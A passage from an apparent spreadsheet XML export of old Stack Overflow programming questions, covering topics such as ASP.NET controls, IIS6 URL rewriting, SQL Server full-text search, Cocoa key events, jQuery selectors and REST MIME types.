&lt;p&gt;Also, How would the user at a workstation be notified a document had been sent to their machine?&lt;/p&gt;
&lt;p&gt;Thanks for any help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP - Javascript Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently developing (another) Open Source CMS in PHP and I'd like to use javascript controls especially for the admin panel. The question is, are there any open-source, freely distributable controls (for creating javascript Editable Grids, Trees, tabs etc ) that have an interface for PHP ?&lt;/p&gt;
&lt;p&gt;I've experimented with &lt;a href="http://extjs.com/" rel="nofollow"&gt;ExtJs&lt;/a&gt; in the past but although its usability and beauty when it comes to implementing it with php, it's a frustration. I've also tried PHP-EXT and ExtPHP libraries but I was disappointed by their generated code, their limited implementation of ExtJs and lack of proper documentation.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.coolite.com/" rel="nofollow"&gt;Coolite&lt;/a&gt; is a nice implementation for .NET but I haven't found anything similar for php. That surprised me, taking into account the years of php development on the market. &lt;/p&gt;
&lt;p&gt;Off course there's always the option of implementing different libraries for each component but this would become an overwhelming task, besides the incompatibilities and the difference in look&amp;amp;feel that are going to come up.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;Thank you in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript/Ajax - Manually remove event handler from a Sys.EventHandlerList()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two scriptcontrols, one holds the other, and I have successfully been able to handle events from the child on the parent using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;initialize: function() 
{
    this._autoComplete = $get(this._autoCompleteID);
    this._onAutoCompleteSelected = Function
      .createDelegate(this, this.handleAutoCompleteSelected);
    var autoControl = this._autoComplete.control;
    autoControl.addItemSelected(this._onAutoCompleteSelected);
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where addItemSelected(on the child) is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;addItemSelected: function(handler) 
{
    list = this.getEvents();
    list.addHandler('userItemSelected', handler);
},
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and getEvents is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;getEvents: function() 
{
    if (this._events == null) 
    {
        this._events = new Sys.EventHandlerList();
    }
    return this._events;
},
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problem is that on dispose of the parent, I want to do the same thing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dispose: function() 
{
    var autoControl = this._autoComplete.control;
    autoControl.removeItemSelected(this._onAutoCompleteSelected);
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but .control no longer exists.  I am guessing this is because the child control has already been disposed and thus the .control property no longer works.  &lt;/p&gt;
&lt;p&gt;In light of this, I decided to run though the event list on the child and remove all the event handlers in it. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dispose: function() 
{
    list = this.getEvents();
    for(var item in list._list)
    {
        var handler;
        handler = list.getHandler(item);
        list.removeHandler(item, handler);
    }
    ....
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a better way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert XSD into SQL relational tables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there something available that could help me convert a XSD into SQL relational tables? The XSD is rather big (in my world anyway) and I could save time and boring typing if something pushed me ahead rather than starting from scratch.&lt;/p&gt;
&lt;p&gt;The XSD is &lt;a href="http://www.grip.no/kjemikalier/XMLstandardformat/hmsdatablad.xsd"&gt;here&lt;/a&gt; if you want to have a look. It's a standardized/localized format to exchange MSDS.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using a custom URL rewriter, IIS6, and urls with .htm, .html, etc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom site I'm building with automatic url rewriting using a custom engine.  The rewriting works fine as long as the page url doesn't end in somehting like .htm or .html.  For these pages it goes directly to the iis 404 page instead of hitting my rewriting engine first.&lt;/p&gt;
&lt;p&gt;I have the * wildcard handler in the "Home Directory" section of the IIS6 configuration of that website but these urls seem to be ignored by it (altho things like css, jpg, js, etc to get sent to the url handler in my web project).  How do i set up IIS6 to force these urls to get sent to the handler, while still serving the page if it exists normally?&lt;/p&gt;
&lt;p&gt;The handler basically does this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (!File.Exists(Request.Path))
{
    doMyRewriting();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have to assume that using a block like this (just and example, the real one does some other stuff to format the Request.Path to be proper with everything) should run the "doMyRewriting()" if the requested file does not exist otherwise it will serve the page normally.  Am I mistaken?&lt;/p&gt;
&lt;p&gt;If I tell IIS specifically to send .htm and .html pages thru to the .NET handler the rewriting works but if the page is actually there it will not serve it.&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do regular expressions work in selenium?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to store part of an id, and throw out the rest. For example, I have an html element with an id of 'element-12345'. I want to throw out 'element-' and keep '12345'. How can I accomplish this?&lt;/p&gt;
&lt;p&gt;I can capture and echo the value, like this:&lt;/p&gt;
&lt;pre&gt;| storeAttribute | //pathToMyElement@id | myId |
| echo | ${!-myId-!} | |&lt;/pre&gt;
&lt;p&gt;When I run the test, I get something like this:&lt;/p&gt;
&lt;pre&gt;| storeAttribute | //pathToMyElement@id | myId |
| echo | ${myId} | element-12345 |&lt;/pre&gt;
&lt;p&gt;I'm recording with the Selenium IDE, and copying the test over into Fitnesse, using the Selenium Bridge fixture. The problem is I'm using a clean database each time I run the test, with random ids that I need to capture and use throughout my test.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the current best practices for load testing and profiling ASP.NET web applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am tasked with improving the performance of a particular page of the website that has an extremely high response time as reported by google analytics.&lt;/p&gt;
&lt;p&gt;Doing a few google searches reveals a product that came with VS2003 called ACT (Application Center Test) that did load testing.   This doesn't seem to be distributed any longer&lt;/p&gt;
&lt;p&gt;I'd like to be able to get a baseline test of this page before I try to optimize it, so I can see what my changes are doing.&lt;/p&gt;
&lt;p&gt;Profiling applications such as dotTrace from Jetbrains may play into it and I have already isolated some operations that are taking a while within the page using trace.  &lt;/p&gt;
&lt;p&gt;What are the best practices and tools surrounding performance and load testing?  I'm mainly looking to be able to see results not how to accomplish them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Full-Text Search in SQL Server 2008 across multiple tables, columns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to search across multiple columns from two tables in my database using Full-Text Search. The two tables in question have the relevant columns full-text indexed.&lt;/p&gt;
&lt;p&gt;The reason I'm opting for Full-text search:
1. To be able to search accented words easily (cafÃ¨)
2. To be able to rank according to word proximity, etc. 
3. "Did you mean XXX?" functionality&lt;/p&gt;
&lt;p&gt;Here is a &lt;strong&gt;dummy&lt;/strong&gt; table structure, to illustrate the challenge:&lt;/p&gt;
&lt;pre&gt;
&lt;strong&gt;Table Book&lt;/strong&gt;
BookID
Name (Full-text indexed)
Notes (Full-text indexed)
&lt;strong&gt;Table Shelf&lt;/strong&gt;
ShelfID
BookID
&lt;strong&gt;Table ShelfAuthor&lt;/strong&gt;
AuthorID
ShelfID
&lt;strong&gt;Table Author&lt;/strong&gt;
AuthorID
Name (Full-text indexed)
&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;I need to search across Book Name, Book Notes and Author Name.&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;I know of two ways to accomplish this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Using a Full-text Indexed View:&lt;/strong&gt; This would have been my preferred method, but I can't do this because for a view to be full-text indexed, it needs to be schemabound, not have any outer joins, have a unique index. The view I will need to get my data does not satisfy these constraints (it contains many other joined tables I need to get data from).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Using joins in a stored procedure&lt;/strong&gt;: The problem with this approach is that I need to have the results sorted by rank. If I am making multiple joins across the tables, SQL Server won't search across multiple fields by default. I can combine two individual CONTAINS queries on the two linked tables, but I don't know of a way to extract the &lt;strong&gt;combined&lt;/strong&gt; rank from the two search queries. For example, if I search for 'Arthur', the results of both the Book query and the Author query should be taken into account and weighted accordingly. &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Determining the path to Outlook.exe from java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to invoke outlook from the command line (for various reasons) and wanted to know how I go about discovering the Path to the Outlook.exe file.&lt;/p&gt;
&lt;p&gt;I'm pretty sure it's stored in the registry, but was wondering how to go about reading that from Java.&lt;/p&gt;
&lt;p&gt;thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to customize the background color of the standard label within a UITableViewCell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying for the past several hours to figure out how to do this, but with no luck. There are several potential solutions for this when searching Google, but nothing seems to work.&lt;/p&gt;
&lt;p&gt;I'm trying to customize the background color of the standard UILabel that goes in a UITableViewCell (since I already customized the background color of the cell itself), but nothing I do seems to work.&lt;/p&gt;
&lt;p&gt;I'm creating my own UILabel to customize the colors in -tableView:cellForRowAtIndexPath:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UILabel* label = [[[UILabel alloc] init] autorelease];
label.textColor = [UIColor blueColor];
label.backgroundColor = [UIColor redColor];
label.opaque = YES;
[cell.contentView addSubview:label];
cell.text = @"Sample text here";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that doesn't work, and the resulting table view still has a bunch of cells with labels with black text and white background in it.&lt;/p&gt;
&lt;p&gt;Any clues on what I am doing wrong here?&lt;/p&gt;
&lt;p&gt;UPDATE: If I try to do the following instead:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UILabel* label = [[[UILabel alloc] init] autorelease];
label.textColor = [UIColor blueColor];
label.backgroundColor = [UIColor redColor];
label.opaque = YES;
[cell.contentView addSubview:label];
label.text = @"Sample text here";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get a bunch of UITableViewCells with no text at all.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Handling dynamically generated controls in asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to handle data entered through dynamically generated controls in ASP.NET?&lt;/p&gt;
&lt;p&gt;Currently, I have a group of controls that are generated in the Page_Load stage, and I need to access the data from them. It seems like it might be possible to just use a hidden field that's read and parsed on postback, but I'd like to know if there's a better way to do it that makes better use of the framework.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I am confused about SOAP namespaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am learning about SOAP implementation and have become somewhat confused regarding the appropriate namespace URI for a SOAP 1.2 Envelope.  &lt;/p&gt;
&lt;p&gt;The &lt;a href="http://www.w3.org/TR/soap12-part1"&gt;w3c specification for SOAP&lt;/a&gt; refers to the &lt;code&gt;"http://www.w3.org/2003/05/soap-envelope"&lt;/code&gt; namespace.  However, I have seen other examples that refer to the &lt;code&gt;"http://schemas.xmlsoap.org/soap/envelope/"&lt;/code&gt; namespace.  &lt;/p&gt;
&lt;p&gt;It seems to me that one or the other namespace should be used.  Which of these two is the correct namespace URI to use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use of Print Preview in .Net Winforms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing c# code in .Net 2008 Winforms.&lt;/p&gt;
&lt;p&gt;I created a print preview window to create a report. It works fine I can preview the report and then print it. The only problem is it is not as flexible as the Office Print preview. The users cannot chose a printer other that the default printer and they cannot limit the print to certain pages. Perhaps I am missing some prperties I need.&lt;/p&gt;
&lt;p&gt;Here is a portion of the code I use:                &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PrintDocument pd = new PrintDocument();
            pd.PrintPage += new PrintPageEventHandler(this.PrintTheGraph);
            pd.DefaultPageSettings.Landscape = true;
            // Allocate a print preview dialog object.
            PrintPreviewDialog dlg = new PrintPreviewDialog();
            dlg.Width = 100;
            dlg.MinimumSize = new Size(375, 250);
            dlg.SetBounds(100, -550, 800, 800);
            dlg.Document = pd;
            DialogResult result = dlg.ShowDialog();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks, &lt;/p&gt;
&lt;p&gt;Bob&lt;/p&gt;
</t>
  </si>
  <si>
    <t>retaining list selectedIndex between data binding reloads in Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my Flex interface, I've got a few List components that are data bound to ArrayCollections. I'm finding that when the ArrayCollections are updated (by Web services) and the data bindings for the Lists update, each List is reset and its selectedIndex is dropped. This is a problem if a user is in the middle of a task and has already selected an item in the List, but hasn't yet submitted the form.&lt;/p&gt;
&lt;p&gt;I know how I can kludge together some ActionScript to deal with these cases, but do you know of any way to handle this more naturally using Flex's data binding or general-purpose  event utilities?&lt;/p&gt;
&lt;p&gt;As always, thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you like your primary keys?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a fairly animated discussion in my team I was made to think what most people like as primary keys. We had the following groups-&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Int/ BigInt which autoincrement are good enough primary keys.&lt;/li&gt;
&lt;li&gt;There should be at least 3 columns that make up the primary key.&lt;/li&gt;
&lt;li&gt;Id, GUID and human readable row identifiers all should be treated differently.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Whats the best approach for PKs? It would be awesome if you could justify your opinion. Is there a better approach that the above? &lt;/p&gt;
&lt;p&gt;EDIT: Anyone has a simple sample/algorithm to generate human readable identifiers for rows that scales well?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding multiple function calls to a case of in delphi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;  case i of
         0..99  :   Function-call('bobo') ;
         100..209 : function-smell('Hobo');
         210..300 : function-yikes('argh');
       end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But what if I wanted 210..300 to call both function yikes and function smell?  Can't figure out how thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design Patterns - Architecture Astronaut</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Perhaps my question is similar in nature to this one: &lt;a href="http://stackoverflow.com/questions/11586/do-you-use-design-patterns"&gt;Do you use design patterns?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The programs that I write are small 50-75 K line programs mostly using &lt;a href="http://en.wikipedia.org/wiki/Windows_Forms" rel="nofollow"&gt;Windows Forms&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/ASP.NET" rel="nofollow"&gt;ASP.NET&lt;/a&gt;.  These programs are GUI intensive allowing the design and layout of various graphics and graphics processing.&lt;/p&gt;
&lt;p&gt;I consider myself good at OOP and practiced at balancing OOP and traditional procedural methods to create maintainable code.&lt;/p&gt;
&lt;p&gt;The problem comes in when I consider design patterns.  The linked to thread has an interesting comment that design patterns may be used but not intentionally.  When I want to intentionally use a design pattern (in the design of my program), it feels like I'm going above and beyond what is needed, that I'm in the realm of "&lt;a href="http://www.joelonsoftware.com/articles/fog0000000018.html" rel="nofollow"&gt;architecture astronaut&lt;/a&gt;" so I fall back to my traditional methods and everything goes along smoothly (i.e. normally).&lt;/p&gt;
&lt;p&gt;Take the MVC pattern as an example.  If I want to implement this pattern using Windows Forms or ASP.NET (Visual Studio 2005) then I have to write a "Framework" and writing frameworks seems to be more trouble than it's worth for the size of the application.&lt;/p&gt;
&lt;p&gt;Perhaps my applications are too small to justify the use of some of these patterns.
Perhaps I just don't know the patterns well enough or need to study them more.&lt;/p&gt;
&lt;p&gt;Does anyone else experience this "architecture astronaut" feeling?&lt;/p&gt;
&lt;p&gt;How do you go about intentionally using design patterns without going "overboard?"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Uninstalling a Windows app installed by a nonexistent user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a .Net Winforms app running on XP machines that are not connected to the internet. We install and update this app by distributing a CD with a .MSI installer file. Users uninstall the old app from the Add or Remove Programs control panel and install the new app from CD.&lt;/p&gt;
&lt;p&gt;A while ago we required users to log in under individual accounts and not a shared account. All these individual accounts are "Standard User" accounts in the Power Users group from the XP User Accounts control panel. Such users are able to install the app for all users, we have tested this and it works.&lt;/p&gt;
&lt;p&gt;Until recently. A user updating a remote machine says the application does not appear in Add or Remove programs, though the application and data files are installed. Trying to run the new installer shows a dialog reading "The system administrator has set policies to prevent this installation". This is not true, we have set no policies on this machine, and there are no Windows Installer policies in the Group Policy panel of Windows Management Console.&lt;/p&gt;
&lt;p&gt;We tried logging on to this machine with an administrator account, and see the same thing.&lt;/p&gt;
&lt;p&gt;My current theory is that the application was installed under an account that was later deleted, and only that user can uninstall the app. But why can an administrator not uninstall the app? Is there some way to have the installer remove the old app, regardless of who installed it?&lt;/p&gt;
&lt;p&gt;Additional information:&lt;/p&gt;
&lt;p&gt;I am not asking how a user can uninstall the app; we create the installer and I want to know how our deployment project can detect and handle this situation.&lt;/p&gt;
&lt;p&gt;A technician logged on to the affected machine as an administrator and says the app does appear in the Add/Remove control panel but there's no Remove button, selecting it shows app info but no buttons.&lt;/p&gt;
&lt;p&gt;I do not know for sure if the app was originally installed by a deleted user, this is a guess based on the fact user accounts were recently changed on this machine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>splash screen w/ load assembly status</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a splash screen that shows assemblies (all referenced library) loading status. I use AppDomain.AssemblyLoad AssemblyLoadEventHandler delegate to catch what assembly is being loaded but the problem is the event is not triggered when the program initializes. I tried register the event handler in application startup "MyApplication_Startup" but it didn't work. Here's my test code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Partial Friend Class MyApplication
    Private Sub MyApplication_Startup(ByVal sender As Object, ByVal e As Microsoft.VisualBasic.ApplicationServices.StartupEventArgs) Handles Me.Startup
        AddHandler AppDomain.CurrentDomain.AssemblyLoad, AddressOf MyAssemblyLoadEventHandler
    End Sub
    Sub MyAssemblyLoadEventHandler(ByVal sender As Object, ByVal args As AssemblyLoadEventArgs)
        Console.WriteLine("&amp;gt;&amp;gt;&amp;gt; ASSEMBLY LOADED: " + args.LoadedAssembly.FullName)
        Console.WriteLine()
    End Sub
End Class
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What have you used Regular Expressions for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have heard of regular expressions and only seen use cases for a few things so I don't think of using them very often.  In the past I have done a couple of things and it has taken me hours to do.  Later I talk to someone and they say "here is how to do it using a regular expression".&lt;/p&gt;
&lt;p&gt;So what are things for which you have used Regular Expressions? If I get more examples then maybe I can begin to know when to look for and use them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ to SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am finishing off a C# ASP.NET program that allows the user to build their own computer by selecting hardware components such as memory, cpu, etc from a drop down lists. The SQL datatable has 3 columns; ComputerID, Attribute and Value. The computerID is an ID that corresponds to a certain computer in my main datatable of products, the Attribtute is the name of the hardware component; memory,cpu, hard drive etc.. and the value is the value assigned to that attribute, such as 1GB or 2.8GHz 320GB. This means that a computer will have multiple attributes. &lt;/p&gt;
&lt;p&gt;What I am trying to do it narrow down the results by first selecting all computers that meet the first attribute requirements and then getting from that list, all computers that meet the next requirement.. and so on for about 10+ attributes.&lt;/p&gt;
&lt;p&gt;I thought it might be a good idea to show you an example of my LINQ to SQL query so that you have a btter idea of what I am trying to do. This basically selects the ComputerID where the the computers memory is larger than 1GB.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var resultsList = from results in db.ComputerAttributes
                  where computer.Value == "MEMORY" &amp;amp;&amp;amp; computer.Value &amp;gt;= "1"
                  select results.ComputerID;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next I want to select from the resultsList where the CPU is say, faster than 2.8Ghz and so on. &lt;/p&gt;
&lt;p&gt;I hope I have given you enough information.
If anyone could please give me some advice as to how I might go about finishing this project that would be great.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What MIME type if JSON is being returned by a REST API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My REST API returns JSON. &lt;/p&gt;
&lt;p&gt;I'm currently returning text/plain as the MIME type, but it feels funny.
Should I be returning &lt;code&gt;application/x-javascript&lt;/code&gt; or some other type?&lt;/p&gt;
&lt;p&gt;The second question is with regard to the HTTP status code for error conditions.
If my REST API is returning an error state, I am returning as JSON&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{ result: "fail", errorcode: 1024, errormesg: "That sucked. Try again!" }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Should the HTTP status code remain at &lt;code&gt;200 OK&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server Enterprise Manager 2005 - stored procedures not showing up</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using SQL Server Management Studio from SQL Server 2005, I can connect to an instance of SQL Server 2000... but none of the stored procedures show up. Is there some trick to allow SQL Server Enterprise Manager 2005 to properly talk to SQL Server 2000 databases?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cocoa Won't Capture Shift Modifier?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey All,
I have an application in which I'm trying to capture the shift key modifier to perform an action, however when I run the program and press and normal key without the shift key modifier I get a beep and the modifier and key are not sent to my keyDown event.  The relevant code is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSString* eventChars = [theEvent charactersIgnoringModifiers];
if ([eventChars isEqualTo:@"w"]) {
	newPlayerRow++;
	direction = eUp;
} else if ([eventChars isEqualTo:@"x"]) {
	newPlayerRow--;
	direction = eDown;
} else if ([eventChars isEqualTo:@"a"]) {
	newPlayerCol--;
	direction = eLeft;
} else if ([eventChars isEqualTo:@"d"]) {
	newPlayerCol++;
	direction = eRight;
} else {
	[super keyDown:theEvent];
	return;
}
// handle the player firing a bullet
if (([theEvent modifierFlags] &amp;amp; (NSShiftKeyMask | NSAlphaShiftKeyMask)) != 0) {
	NSLog(@"Shift key");
	[self fireBulletAtColumn:newPlayerCol row:newPlayerRow inDirection:direction];
	[self setNeedsDisplay:YES];
} else {
	...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not sure what is causing this, but I'd like to be able to capture shift key presses. Thanks in advance for any help with this problem.&lt;/p&gt;
&lt;p&gt;EDIT: Also I'm using a MacBook keyboard if that makes any difference.&lt;/p&gt;
&lt;p&gt;EDIT: This is definitely a shift-centric problem as changing (NSShiftKeyMask | NSAlphaShiftKeyMask) to NSControlKeyMask does have the desired effect.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is this a Windows XP firewall bug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a webserver running on my Windows XP computer. I have set the firewall to allow incoming HTTP connections: Firewall settings window-&gt;'Advanced' tab-&gt;select my network connection-&gt;Settings-&gt;Services-&gt;check 'Webserver(HTTP)' checkbox. &lt;/p&gt;
&lt;p&gt;Normally, this works. However, sometimes upon restarting the server machine, the firewall again begins blocking HTTP connections, notwithstanding the fact that the 'Webserver(HTTP)' exception is still checked in the Firewall settings window. &lt;/p&gt;
&lt;p&gt;The only way, then, to get things working again is to uncheck the said option, save the settings, reopen the firewall dialog and check the option and save again. &lt;/p&gt;
&lt;p&gt;My question is, is this some peculiarity of my machine or is this a Windows XP firewall bug? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>http-on-examine-response observer - possible to block response from further processing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to implement a firefox extension which filters incoming HTTP responses and handles them accordingly.&lt;/p&gt;
&lt;p&gt;I wish to block HTTP responses containing a specific header. Having read through some of the MDC articles, it appears the most common way of observing HTTP responses is by registering an http-on-examine-response observer.&lt;/p&gt;
&lt;p&gt;My question is: Using this observer, is it possible to block the HTTP request from further processing (as a by-product, the page will continue to wait for a response)? Or do I need to use some other facet of XPCOM (if so, care to point me in the right direction)?&lt;/p&gt;
&lt;p&gt;Thanks in advance,&lt;br/&gt;Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use a Regex in an XPath expression?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Something like &lt;code&gt;.//div[@id='foo\d+]&lt;/code&gt; to capture div tags with &lt;code&gt;id='foo123'&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I'm using .NET, if that matters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS issue: link is wrongly displayed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;a {
    color: #000;
}
a:hover {
    text-decoration: none;
    color: #fff;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is the code I use. But, none of the links I have in my pages listen to this. They abide by this instead:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#menu li, a{
    text-align: center;
    display: block;
    float: left;
    margin: 0;
    font-family: Arial, Helvetica, sans-serif;
    font-size:1.2em;
    color: #575757;
    text-decoration: none;
    list-style: none;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Therefore a lot of the links are skewed, as they all float left and things.&lt;br /&gt;
The code for the links itself isn't wrapped in any way. At least not in a way that explains my errors.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="footer"&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;center&amp;gt;Copyright 2008 - &amp;lt;a href="index.php"&amp;gt;G.S.B.V. Pugilice&amp;lt;/a&amp;gt;&amp;lt;/center&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That bit of code gives me two lines instead of one, the link floats left on the second line.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to format a Date without using code - Format String Question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I achieve the following with a format string: Do 01.01.2009 ?
It has to work in all languages (the example would be for Germany). So there should only be the short weekday and then the short date.&lt;/p&gt;
&lt;p&gt;I tried 'ddd d' (without the '). However, this leads to 'Do 01'.
Is there maybe a character I can put before the 'd' so that it is tread on its own or something like that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Policy to allow user to enumerate accounts only within his own OU in Active Directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to define a policy which restricts a user to enumerate only accounts in his own OU?&lt;/p&gt;
&lt;p&gt;For example lets consider a domain Contosos and OUs Sales and HR.The Sales OU has two users A and B and the HR OU has users C and D.&lt;/p&gt;
&lt;p&gt;Is it possible to define a policy so that A can only enumerate accounts A and B and C can only enumerate C and D and not the accounts not in their OU?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make jQuery modify only one div, instead of all divs of the same class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Each page of my site has 10 (almost) identical divs, varying only in the text within. When a certain part of a div is clicked, I want a different part of that div to be modified.&lt;/p&gt;
&lt;p&gt;I'm using this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(document).ready(function(){
 $(".notLogged img").mouseover(function(){
  $(this).parent()&amp;gt;$("span").html("You must be logged in to vote.");
 })
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I  thought this would work as follows:  For all &lt;code&gt;img&lt;/code&gt; elements within a "notLogged" classed div, a mouseover would cause a different part of that div to change.&lt;/p&gt;
&lt;p&gt;However, that's not what happens.  Whenever that mouseover event is triggered, &lt;em&gt;all&lt;/em&gt; divs with the "notLogged" class are modified.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How can I modify this code so only the div in which the mouseover originated is modified?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your convention for specifying complex SQL queries in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am fairly new to Rails and I was curious as to some of the conventions experts are using when they need to construct a very complex SQL query that contains many conditions. Specifically, keeping the code readable and maintainable. &lt;/p&gt;
&lt;p&gt;There are a couple of ways I can think of:&lt;/p&gt;
&lt;p&gt;Single line, in the call to find():&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@pitchers = Pitcher.find(:all, "&amp;lt;conditions&amp;gt;")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Use a predefined string and pass it in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@pitchers = Pitcher.find(:all, @conditions)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Use a private member function to return a query&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@pitchers = Pitcher.find(:all, conditionfunction)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I sort of lean towards the private member function convention, additionally because you could pass in parameters to customize the query. &lt;/p&gt;
&lt;p&gt;Any thoughts on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can my .NET Web Services be considered as a RESTful interface?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Happy New Year.&lt;/p&gt;
